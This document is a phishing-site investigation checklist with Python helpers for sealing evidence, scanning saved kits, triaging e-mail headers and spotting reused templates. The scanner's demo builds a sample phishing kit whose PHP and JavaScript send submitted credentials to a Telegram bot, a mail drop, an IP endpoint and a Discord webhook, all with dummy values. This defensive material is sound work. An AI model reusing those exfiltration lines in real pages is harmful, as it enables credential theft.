This guide describes a full, field-ready workflow for investigating phishing websites — including evidence preservation, offline analysis, DNS/IP intelligence, infrastructure mapping, source-code inspection, campaign analysis, and final documentation.
1. Evidence Collection (if the phishing page is still active)
☐ Perform a full website capture from a controlled egress (VPN or sandbox VM), because every fetch tells the operator that someone is looking
   Tools: HTTrack, Wget (recursive mirror), Burp Suite (proxy history), Wayback Machine (request a save so a third party holds an independent copy)
☐ Save HTML, JS, CSS, favicon, images; keep the favicon, since its hash is a pivot for Shodan and Censys later
   Tools: Manual export, HTTrack, Developer Tools → “Save all resources”
☐ Capture full-page screenshots that show the URL bar and the HTTPS lock
   Tools: Firefox Developer Tools, Chrome DevTools
☐ Record the capture timestamp (UTC), the IP the domain resolved to at capture time, and the User-Agent you used; kits often cloak by User-Agent and geolocation, so a later capture may show different content
   Tools: Burp Suite, Wireshark
☐ Capture network traffic during a form submission, using fabricated credentials only; this is what reveals the exfiltration endpoint
   Tools: Wireshark, Burp Suite, Fiddler
☐ Store the domain's DNS records (A, AAAA, CNAME, NS, MX, TXT) as they were at capture time
   Tools: dig, nslookup, ViewDNS.info, SecurityTrails
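Sealing the capture as a manifest, as an added example (this code is not from the original guide): it hashes every file in the mirror directory, stores the capture context from the checklist (UTC timestamp, resolved IP, User-Agent, DNS records) next to the hashes, and re-verifies the directory later so any post-capture modification is detected. The capture directory, file contents, URL, IP and DNS values are constructed for the demo; in practice you point it at the HTTrack or wget output directory.

```python
import hashlib
import json
import os
import tempfile
from datetime import datetime, timezone


def sha256_file(path):
    """Stream the file through SHA-256 so large captures are not read into memory."""
    digest = hashlib.sha256()
    with open(path, "rb") as fh:
        for chunk in iter(lambda: fh.read(1 << 16), b""):
            digest.update(chunk)
    return digest.hexdigest()


def build_manifest(capture_dir, context):
    """Hash every file under capture_dir and attach the capture context
    (UTC timestamp, resolved IP, User-Agent, DNS records) to the manifest."""
    files = {}
    for root, _dirs, names in os.walk(capture_dir):
        for name in sorted(names):
            full = os.path.join(root, name)
            rel = os.path.relpath(full, capture_dir).replace(os.sep, "/")
            files[rel] = {"sha256": sha256_file(full), "size": os.path.getsize(full)}
    return {
        "captured_at_utc": context.get("captured_at_utc")
        or datetime.now(timezone.utc).isoformat(),
        "target_url": context["target_url"],
        "resolved_ip": context["resolved_ip"],
        "user_agent": context["user_agent"],
        "dns_records": context.get("dns_records", {}),
        "files": files,
    }


def verify_manifest(capture_dir, manifest):
    """Re-hash the capture directory and return (path, problem) pairs for files
    that were modified, removed, or added after the manifest was written."""
    problems = []
    for rel, meta in manifest["files"].items():
        full = os.path.join(capture_dir, rel)
        if not os.path.exists(full):
            problems.append((rel, "missing"))
        elif sha256_file(full) != meta["sha256"]:
            problems.append((rel, "modified"))
    for root, _dirs, names in os.walk(capture_dir):
        for name in sorted(names):
            rel = os.path.relpath(os.path.join(root, name), capture_dir).replace(os.sep, "/")
            if rel != "manifest.json" and rel not in manifest["files"]:
                problems.append((rel, "unexpected"))
    return problems


def demo():
    """Write a constructed capture, build its manifest, then tamper with one
    file and show that verification reports it. Returns (manifest, clean, tampered)."""
    capture_dir = tempfile.mkdtemp(prefix="phish_capture_")
    # Constructed sample capture: a fake login page and its script (not a real kit).
    with open(os.path.join(capture_dir, "index.html"), "w") as fh:
        fh.write("<html><form action='post.php' method='post'></form></html>")
    with open(os.path.join(capture_dir, "app.js"), "w") as fh:
        fh.write("console.log('loaded');")
    context = {  # all values constructed for the demo
        "captured_at_utc": "2024-09-03T09:20:00+00:00",
        "target_url": "https://login-example.invalid/",
        "resolved_ip": "203.0.113.10",  # TEST-NET-3 documentation range
        "user_agent": "Mozilla/5.0 (investigator capture profile)",
        "dns_records": {"A": ["203.0.113.10"], "NS": ["ns1.example.invalid"]},
    }
    manifest = build_manifest(capture_dir, context)
    with open(os.path.join(capture_dir, "manifest.json"), "w") as fh:
        json.dump(manifest, fh, indent=2, sort_keys=True)
    clean = verify_manifest(capture_dir, manifest)
    # Simulate someone editing an artefact after the capture was sealed.
    with open(os.path.join(capture_dir, "app.js"), "a") as fh:
        fh.write("\n// edited after capture")
    tampered = verify_manifest(capture_dir, manifest)
    return manifest, clean, tampered


if __name__ == "__main__":
    manifest, clean, tampered = demo()
    print(json.dumps(manifest, indent=2, sort_keys=True))
    print("verification right after capture:", clean)
    print("verification after tampering:", tampered)
```

Keep the manifest (and ideally a signed or timestamped copy of it) outside the capture directory; the verification step is what lets you show later that the artefacts handed to a registrar or law enforcement are the ones you captured.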
2. Offline Analysis of the Phishing Website
☐ Check archival services for past snapshots (the page may already have changed or gone offline)
   Tools: archive.org, cachedview.com, urlscan.io, VirusTotal
☐ Extract metadata, external links, and redirect chains from the saved copy and from public scans
   Tools: urlscan.io, VirusTotal (URL report)
☐ Perform a WHOIS lookup (registrar, creation date, nameservers, contacts); expect registrant details to be redacted, but a creation date only days old is itself a strong signal
   Tools: DomainTools WHOIS, ICANN Lookup
☐ Retrieve historical DNS data to see earlier hosting and related domains
   Tools: SecurityTrails, PassiveTotal / RiskIQ (now part of Microsoft Defender Threat Intelligence)
3. IP Address & Hosting Infrastructure
☐ Identify IP geolocation, ASN, and hosting provider
   Tools: IPinfo.io, MaxMind GeoIP, ip-api.com
☐ Reverse IP lookup (other domains on the same host, which often belong to the same campaign)
   Tools: SecurityTrails, ViewDNS.info, Shodan
☐ Map infrastructure connections: hosting, TLS certificates from Certificate Transparency logs, certificate and favicon fingerprints
   Tools: Censys, crt.sh, Shodan certificate search
4. Technical Source-Code Analysis
☐ Inspect where the form submits stolen data: the form's action attribute, any fetch/XMLHttpRequest calls in JS, and the redirect shown after submission
   Tools: Browser Developer Tools (Network tab), Burp Suite
☐ Search for webhooks (Telegram bot tokens, Discord webhook URLs), e-mail addresses, and developer comments; kit authors often leave contact handles behind
   Tools: Manual review of HTML, JS, inline scripts
☐ Identify tech stack / CMS / platform
   Tools: WhatCMS.org, Wappalyzer
5. Abuse of Third-Party Services
☐ Check for abuse of third-party services: Google Ads (malvertising), Telegram bots used as exfiltration channels, free hosting and free TLS certificates
   Tools: Google Transparency Report, Telegram Bot DB, AbuseIPDB
☐ Detect use of compromised legitimate sites (phishing pages planted under a path of an otherwise benign domain)
   Tools: urlscan.io, PublicWWW.com
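A static scan of a saved kit that covers the source-code checks in section 4 and the Telegram/webhook abuse check above, added here as an example (not code from the original guide). It parses every HTML file for forms, resolves the action URL against the phishing site's base URL, flags credential-looking inputs, collects HTML comments, and regex-scans every file for Telegram bot tokens and API calls, Discord webhooks, e-mail addresses and JavaScript exfiltration targets. The three-file kit it scans is constructed; the token and webhook values are dummies in the real formats, and the base URL uses the reserved .invalid TLD.

```python
import os
import re
import tempfile
from html.parser import HTMLParser
from urllib.parse import urljoin

# A Telegram bot token is "<numeric bot id>:<35-char secret>"; a Discord webhook
# is ".../api/webhooks/<id>/<token>". The demo kit below uses dummy values.
PATTERNS = {
    "telegram_bot_token": re.compile(r"\b\d{8,10}:[A-Za-z0-9_-]{35}\b"),
    "telegram_api_call": re.compile(r"https?://api\.telegram\.org/bot[^\s'\"]+"),
    "discord_webhook": re.compile(
        r"https?://(?:canary\.|ptb\.)?discord(?:app)?\.com/api/webhooks/\d+/[\w-]+"),
    "email_address": re.compile(r"[\w.+-]+@[\w-]+\.[\w.-]+"),
    "fetch_target": re.compile(  # fetch("url"), $.post("url"), axios.post("url")
        r"(?:fetch|\$\.post|\$\.ajax|axios\.post)\s*\(\s*['\"]([^'\"]+)['\"]"),
    "xhr_target": re.compile(  # xhr.open("POST", "url")
        r"\.open\s*\(\s*['\"][A-Za-z]+['\"]\s*,\s*['\"]([^'\"]+)['\"]"),
}
CREDENTIAL_HINTS = ("pass", "pwd", "user", "email", "login", "otp", "card", "cvv")


class FormCollector(HTMLParser):
    """Collect each <form> with its resolved action URL, method and inputs,
    plus every HTML comment (kit authors tend to leave notes in them)."""

    def __init__(self, base_url):
        super().__init__()
        self.base_url, self.forms, self.comments, self._current = base_url, [], [], None

    def handle_starttag(self, tag, attrs):
        attrs = dict(attrs)
        if tag == "form":
            self._current = {"action": urljoin(self.base_url, attrs.get("action") or ""),
                             "method": (attrs.get("method") or "get").lower(), "inputs": []}
            self.forms.append(self._current)
        elif tag == "input" and self._current is not None:
            self._current["inputs"].append(
                (attrs.get("name") or "", (attrs.get("type") or "text").lower()))

    def handle_endtag(self, tag):
        if tag == "form":
            self._current = None

    def handle_comment(self, data):
        self.comments.append(data.strip())


def credential_fields(form):
    """Names of inputs that look like they collect credentials or card data."""
    return [name for name, typ in form["inputs"]
            if typ == "password" or any(h in name.lower() for h in CREDENTIAL_HINTS)]


def scan_kit(kit_dir, base_url):
    """Parse forms out of HTML files and regex-scan every file for indicators."""
    report = {"forms": [], "comments": [], "indicators": {k: set() for k in PATTERNS}}
    for root, _dirs, names in os.walk(kit_dir):
        for name in sorted(names):
            path = os.path.join(root, name)
            with open(path, encoding="utf-8", errors="replace") as fh:
                text = fh.read()
            if name.lower().endswith((".html", ".htm")):
                parser = FormCollector(base_url)
                parser.feed(text)
                for form in parser.forms:
                    form["file"] = os.path.relpath(path, kit_dir)
                    form["credential_fields"] = credential_fields(form)
                    report["forms"].append(form)
                report["comments"].extend(parser.comments)
            for key, pattern in PATTERNS.items():
                report["indicators"][key].update(pattern.findall(text))
    report["indicators"] = {k: sorted(v) for k, v in report["indicators"].items()}
    return report


def demo():
    """Write a constructed three-file kit to a temp dir and scan it."""
    kit_dir = tempfile.mkdtemp(prefix="phish_kit_")
    files = {  # constructed kit; token, webhook, addresses and IP are dummies
        "index.html": ("<!-- kit v2, contact kitseller@example.invalid -->\n"
                       "<html><body><form id='login' action='next.php' method='post'>\n"
                       "<input name='email' type='text'><input name='password' type='password'>\n"
                       "<input type='submit' value='Sign in'></form>\n"
                       "<script src='app.js'></script></body></html>\n"),
        "next.php": ("<?php\n"
                     "$token = \"1234567890:AAAAAAAAAABBBBBBBBBBCCCCCCCCCCDDDDD\";\n"
                     "file_get_contents(\"https://api.telegram.org/bot$token/sendMessage?chat_id=-100123\"\n"
                     "  . \"&text=\" . urlencode($_POST['email'] . ':' . $_POST['password']));\n"
                     "mail(\"dropbox@example.invalid\", \"Rezult\", print_r($_POST, true));\n"
                     "header(\"Location: https://login-example.invalid/real\");\n?>\n"),
        "app.js": ("fetch('https://203.0.113.10/collect', {method: 'POST', body: JSON.stringify(creds)});\n"
                   "var xhr = new XMLHttpRequest();\n"
                   "xhr.open('POST', 'https://discord.com/api/webhooks/123456789012345678/abcDEF_ghi-JKL');\n"),
    }
    for name, content in files.items():
        with open(os.path.join(kit_dir, name), "w", encoding="utf-8") as fh:
            fh.write(content)
    return scan_kit(kit_dir, "https://login-example.invalid/")


if __name__ == "__main__":
    import json
    print(json.dumps(demo(), indent=2))
```

Run it against the directory HTTrack or wget produced; the resolved form action and the JS/XHR targets are the exfiltration endpoints to add to the infrastructure map, and a bot token or webhook URL is what you hand to the abused service's abuse desk.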
6. Campaign Analysis (Distribution Vectors)
☐ Analyze phishing e-mails or SMS messages: read the Received chain bottom-up (only the hop your own mail server added is trustworthy), check the SPF/DKIM/DMARC results, and compare From with Return-Path and Reply-To
   Tools: Email header analyzers, MXToolbox, mail-tester.com
☐ Check whether the phishing link was delivered via social media or URL shorteners, and expand shortened links without visiting the final page
   Tools: CheckShortURL, unshorten.it, VirusTotal URL scan
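Header triage for the e-mail vector, as an added example (not from the original guide): the standard-library email parser reads a constructed message, walks the Received chain oldest-first, extracts the SPF/DKIM/DMARC verdicts, compares the From domain with Return-Path and Reply-To, and pulls the URLs from the body, flagging shorteners from a short illustrative list. The message, its domains (reserved .invalid TLD) and IPs (documentation ranges) are all constructed.

```python
import re
from email import policy
from email.parser import Parser
from email.utils import parseaddr

# Constructed sample message, in delivery order: newest Received header first.
RAW_MESSAGE = """\
Return-Path: <bounce@mailer-bulk.invalid>
Received: from mx.victim-corp.invalid (mx.victim-corp.invalid [198.51.100.7])
\tby inbox.victim-corp.invalid with ESMTPS; Tue, 03 Sep 2024 09:14:02 +0000
Received: from relay.mailer-bulk.invalid (unknown [203.0.113.77])
\tby mx.victim-corp.invalid with ESMTP id 7Q2; Tue, 03 Sep 2024 09:14:01 +0000
Received: from [10.0.0.5] (unknown [203.0.113.77])
\tby relay.mailer-bulk.invalid; Tue, 03 Sep 2024 09:13:58 +0000
Authentication-Results: mx.victim-corp.invalid;
\tspf=pass smtp.mailfrom=mailer-bulk.invalid;
\tdkim=none;
\tdmarc=fail header.from=bank-example.invalid
From: "Bank Example" <security@bank-example.invalid>
Reply-To: verify@mailer-bulk.invalid
To: employee@victim-corp.invalid
Subject: Urgent: confirm your account
Content-Type: text/plain; charset=utf-8

Your account is locked. Confirm at https://bit.ly/3xample or
https://bank-example-login.invalid/verify?id=42 within 24 hours.
"""

HOP_RE = re.compile(r"from\s+(\S+).*?\[(\d{1,3}(?:\.\d{1,3}){3})\]", re.S)
AUTH_RE = re.compile(r"\b(spf|dkim|dmarc)=(\w+)")
URL_RE = re.compile(r"https?://[^\s<>\"')\]]+")
SHORTENERS = {"bit.ly", "t.co", "tinyurl.com", "goo.gl", "is.gd", "cutt.ly"}  # illustrative


def received_chain(msg):
    """Hops oldest-first as (claimed sending host, connecting IP). Only the hop
    added by a server you trust is reliable; earlier hops are attacker-supplied."""
    hops = []
    for header in reversed(msg.get_all("Received", [])):
        match = HOP_RE.search(str(header))
        if match:
            hops.append((match.group(1), match.group(2)))
    return hops


def auth_results(msg):
    """SPF/DKIM/DMARC verdicts as recorded by the receiving MX."""
    results = {}
    for header in msg.get_all("Authentication-Results", []):
        for mechanism, verdict in AUTH_RE.findall(str(header)):
            results[mechanism] = verdict.lower()
    return results


def sender_alignment(msg):
    """Compare the domain the user sees (From) with the envelope sender
    (Return-Path) and Reply-To; a mismatch is the classic spoofing tell."""
    def domain(value):
        return parseaddr(str(value or ""))[1].rpartition("@")[2].lower()
    from_d, rp_d, reply_d = domain(msg["From"]), domain(msg["Return-Path"]), domain(msg["Reply-To"])
    return {"from": from_d, "return_path": rp_d, "reply_to": reply_d,
            "aligned": from_d == rp_d and reply_d in ("", from_d)}


def body_urls(msg):
    """Every URL in the text body, in order of appearance, de-duplicated."""
    part = msg.get_body(preferencelist=("plain", "html"))
    text = part.get_content() if part is not None else ""
    seen, urls = set(), []
    for url in URL_RE.findall(text):
        if url not in seen:
            seen.add(url)
            urls.append(url)
    return urls


def triage(raw):
    msg = Parser(policy=policy.default).parsestr(raw)
    urls = body_urls(msg)
    return {
        "received_chain": received_chain(msg),
        "auth": auth_results(msg),
        "sender": sender_alignment(msg),
        "urls": urls,
        "shortened": [u for u in urls if u.split("/")[2].lower() in SHORTENERS],
    }


if __name__ == "__main__":
    import json
    print(json.dumps(triage(RAW_MESSAGE), indent=2))
```

In the sample the SPF pass is meaningless for attribution because it was evaluated against the bulk mailer's envelope domain, not the bank's; the DMARC failure against header.from and the Return-Path/Reply-To mismatch are the findings that go into the report, and the shortened URL is expanded with the tools above rather than opened.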
7. Forensic & OSINT Correlation
☐ Cross-check infrastructure via OSINT search engines
   Tools: Spyse, Shodan, Censys, GreyNoise
☐ Detect reused phishing templates, code reuse, and repeated domains (the same kit is usually deployed many times with only the brand changed)
   Tools: PublicWWW, urlscan.io “Similarity” feature
☐ Investigate dark web connections or sale of phishing kits
   Tools: ahmia.fi, Onion search engines (Tor required)
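Template-reuse detection, as an added example that is neither the original guide's code nor urlscan.io's or PublicWWW's algorithm: each page is reduced to its tag skeleton (tag names plus id/class/name/type/method attributes, with text, src, href and action dropped because those change per deployment), the skeleton is cut into overlapping 4-token windows, and two pages are scored with the Jaccard index of their window sets. A kit rebranded from one target to another keeps the same skeleton and scores 1.0; an unrelated lure scores near 0. The three pages are constructed.

```python
import hashlib
from html.parser import HTMLParser

# Attributes that survive rebranding and so belong in the skeleton.
KEEP_ATTRS = ("id", "class", "name", "type", "method")

# Constructed pages: the same kit branded for two targets, and an unrelated lure.
KIT_MICROSOFT = """<html><head><title>Sign in to your Microsoft account</title></head>
<body class="login-bg"><div id="wrap"><img class="logo" src="ms.png">
<form id="login" action="post.php" method="post">
<input name="email" type="text" placeholder="Email">
<input name="password" type="password" placeholder="Password">
<button type="submit">Sign in</button></form>
<p class="foot">Microsoft 2024</p></div></body></html>"""

KIT_BANK = """<html><head><title>Online Banking Login</title></head>
<body class="login-bg"><div id="wrap"><img class="logo" src="bank.png">
<form id="login" action="next.php" method="post">
<input name="email" type="text" placeholder="Customer ID">
<input name="password" type="password" placeholder="PIN">
<button type="submit">Log in</button></form>
<p class="foot">Example Bank</p></div></body></html>"""

UNRELATED_DELIVERY = """<html><head><title>Parcel on hold</title></head>
<body><table class="tracking"><tr><td>Status</td><td>Customs fee due</td></tr></table>
<a class="btn" href="pay.php">Pay now</a></body></html>"""


class Skeleton(HTMLParser):
    """Reduce a page to the ordered sequence of its tags and kept attributes."""

    def __init__(self):
        super().__init__()
        self.tokens = []

    def handle_starttag(self, tag, attrs):
        attrs = dict(attrs)
        parts = [tag] + [f"{k}={attrs[k]}" for k in KEEP_ATTRS if k in attrs]
        self.tokens.append("<" + " ".join(parts) + ">")

    def handle_endtag(self, tag):
        self.tokens.append(f"</{tag}>")


def skeleton(html):
    parser = Skeleton()
    parser.feed(html)
    return parser.tokens


def structural_hash(html):
    """Exact fingerprint of the skeleton, for lookups of identical templates."""
    return hashlib.sha256("\n".join(skeleton(html)).encode()).hexdigest()


def shingles(tokens, k=4):
    """Hashes of every k-token window; shared windows survive small edits."""
    if len(tokens) <= k:
        return {hashlib.sha1(" ".join(tokens).encode()).hexdigest()[:16]}
    return {hashlib.sha1(" ".join(tokens[i:i + k]).encode()).hexdigest()[:16]
            for i in range(len(tokens) - k + 1)}


def similarity(html_a, html_b):
    """Jaccard index of the two shingle sets: 0.0 nothing shared, 1.0 same skeleton."""
    a, b = shingles(skeleton(html_a)), shingles(skeleton(html_b))
    return len(a & b) / len(a | b) if a | b else 0.0


def find_matches(candidate, corpus, threshold=0.8):
    """Names of corpus pages whose structure matches the candidate, best first."""
    scored = [(similarity(candidate, html), name) for name, html in corpus.items()]
    return [name for score, name in sorted(scored, reverse=True) if score >= threshold]


if __name__ == "__main__":
    corpus = {"kit_ms": KIT_MICROSOFT, "delivery": UNRELATED_DELIVERY}
    print("bank vs microsoft:", round(similarity(KIT_BANK, KIT_MICROSOFT), 3))
    print("bank vs delivery:", round(similarity(KIT_BANK, UNRELATED_DELIVERY), 3))
    print("matches for bank kit:", find_matches(KIT_BANK, corpus))
```

Store the structural hash of every page you capture alongside the manifest; an exact hit on a new capture means the same kit, and a high Jaccard score with a different hash means a lightly modified one, which is the link that turns isolated sites into a campaign.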
8. Documentation & Legal Steps
☐ Export all artefacts with hashes and timestamps so they can be verified later
   Tools: Local storage, forensic imaging tools
☐ Build a complete timeline of the phishing operation (domain registration, certificate issuance, first public scan, first report, takedown)
   Tools: Maltego, TimelineJS, Obsidian graphs
☐ Request data from registrar / hosting provider / Google
   Tools: Official LEA procedures and legal requests
Summary
This workflow ensures you:
- preserve evidence safely
- analyze the phishing site offline
- map the infrastructure
- correlate OSINT data
- track distribution vectors
- document the campaign
- escalate legally if needed
It covers technical, forensic, and intelligence aspects of phishing investigations and integrates directly with SystemLog’s OSINT and Forensics methodologies.